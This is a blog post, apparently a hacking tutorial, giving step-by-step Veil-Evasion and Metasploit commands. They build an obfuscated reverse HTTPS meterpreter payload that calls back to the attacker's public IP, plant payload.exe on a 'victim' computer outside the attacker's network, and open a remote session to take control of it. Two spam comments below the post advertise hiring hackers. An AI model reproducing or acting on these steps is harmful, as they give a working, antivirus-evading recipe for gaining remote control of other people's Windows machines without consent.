Hack Windows Veil-Evasion Use Public IP



Hack Windows Veil-Evasion Use Public IP

Public ip is where we can penetration testing Outside Network. using a veil-evasion and metasploit, the lock on the penetration testing outside Network  is the port fordwarding. because of port forwarding is a media liaison between victim and hackers. we could open fordwarding open port on our router, but it all depends on our isp.
  • Open Veil-Evasion. 
  • Open terminal and type #./Veil-Evasion.py. 
  • list
  • Select python/meterpreter/rev_https. With type "use 32"
  • Change USE_PYHERION "Y" With type "use_pyherion Y"
  • Look your Ip Public with open mozilla firefox and type "what my ip" and look your ip public.
  • Set LHOST 114.##.###.###<=Your Ip Public

  • Set LPORT 4449 
  • info
  • generate
  • Enter your name payload
  • Select pwnstaller (obfuscated Pyinstaller loader)
  • Let system copiling your payload.

  •  After compiling finished, you can copy  payload.exe to the computer victim and running it.

  • Open new terminal and type #msfconsole 

  • After metasploit opened you can type "use exploit/multi/handler"

  • Set payload paload windows/meterpeter/reverse_https
  • show options

  • Set LHOST 114.##.###.### <= your ip public

  • Set LPORT 4449

  • Set ReverselistenerBinAddress 10.10.40.5 <=your local ip 

  • exploit

  • Run payload to the computer victim

  • If payload.exe already running in victim computer then meterpreter sessions will be open in your kali linux

  • type help for see all database meterpreter sessions. 
  • type sysinfo for look system info victim computer


  • And finish. you success hacking computer victim in outside network.



Related Posts:

2 Responses to "Hack Windows Veil-Evasion Use Public IP"

  1. If you are looking for more information about flat rate locksmith Las Vegas check that right away. hire a computer hacker

    ReplyDelete
  2. Great post but I was wondering if you could write a little more on this subject? I’d be very thankful if you could elaborate a little bit further. Thanks in advance! Hire a professional phone hacker

    ReplyDelete